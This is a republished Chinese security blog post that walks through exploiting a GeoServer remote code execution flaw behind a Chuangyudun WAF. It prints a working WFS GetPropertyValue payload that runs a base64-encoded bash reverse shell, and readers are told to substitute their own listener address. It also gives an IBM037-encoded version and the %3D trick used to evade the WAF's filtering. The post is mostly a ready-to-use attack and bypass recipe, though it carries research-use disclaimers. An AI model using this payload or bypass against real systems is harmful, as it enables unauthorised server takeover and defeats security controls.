文章总结: 本文记录了一次针对Geoserver漏洞利用时绕过创宇盾WAF的实战过程。核心方法是将POC中的等号编码为%3D以绕过过滤,并提供了编解码脚本。文章给出了详细复现步骤,包括修改typeNames和valueReference字段、编码反弹shell命令等操作,最终成功实现RCE。建议读者在授权测试范围内参考此思路,并注意结合其他编码方式增强绕过效果。 综合评分: 75 文章分类: 漏洞分析,渗透测试,红队,安全工具,实战经验
记某次Geoserver绕waf的经历-附脚本
原创
狐狸 狐狸
狐狸说安全
2026年9月4日 13:42 山东
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
免责声明
由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!
0x01 概述
某次好兄弟找到我说这个Geoserver有洞,但是被waf拦了,帮他打一下,就有了今天的文章……
0x02 正文
复现过程(注意点):
将poc中的等于号先修改为%3D
%85%A7%85%83M%91%81%A5%81K%93%81%95%87K%D9%A4%95%A3%89%94%85K%87%85%A3%D9%A4%95%A3%89%94%85M%5Dk%7D%A2%85%99%A5%89%83%85%A6%86%A2%A5%85%99%A2%89%96%95%F2K%F0K%F0%99%85%98%A4%85%A2%A3%C7%85%A3%D7%99%96%97%85%99%A3%A8%E5%81%93%A4%85%A3%A8%97%85%D5%81%94%85%A2%A2%86z%81%99%83%88%A2%89%A3%85%A2%A5%81%93%A4%85%D9%85%86%85%99%85%95%83%85%85%A7%85%83M%91%81%A5%81K%93%81%95%87K%D9%A4%95%A3%89%94%85K%87%85%A3%D9%A4%95%A3%89%94%85M%5Dk%7D%82%81%A2%88%40%60%83%40%C0%85%83%88%96k%E8%94%C6%A9%81%C3%C1%A3%81%E2%C1N%D1%89%C1%A5%E9%C7%E5%F2%D3%F3%D9%91%83%C3%F8%A7%D4%91%83%A4%D4%C3%F4%A6%D3%91%C5%A5%D4%E3%C9%A9%D5%C3%C1%A6%D7%89%E8%A7%D0O%C0%82%81%A2%85%F6%F4k%60%84%D0O%C0%82%81%A2%88k%60%89%D0%7D%5D%7D%5D
然后使用脚本解码回原文
是这样的,等于号会被过滤掉
所以说原POC为:
ervice=wfs&version2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),’bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}’)
修改反弹shell为你的监听地址后逐段进行编码,等于号作为分隔,&符号不编码
其实,只需要修改typeNames和valueReference字段的值即可
直接生成
整理好之后
在将%3D转化为 = 或者自己手动添加上
最终是这个样子就对了
开启监听,打poc,反弹shell回来,成功绕过创宇盾进行RCE
思路采用 漫漫安全路 公众号作者的文章!
0x03脚本下载地址
本公众号后台回复关键词 ibm037 即可获取编解码脚本
0x04内部圈子
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:狐狸说安全 狐狸 狐狸《记某次Geoserver绕waf的经历-附脚本》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论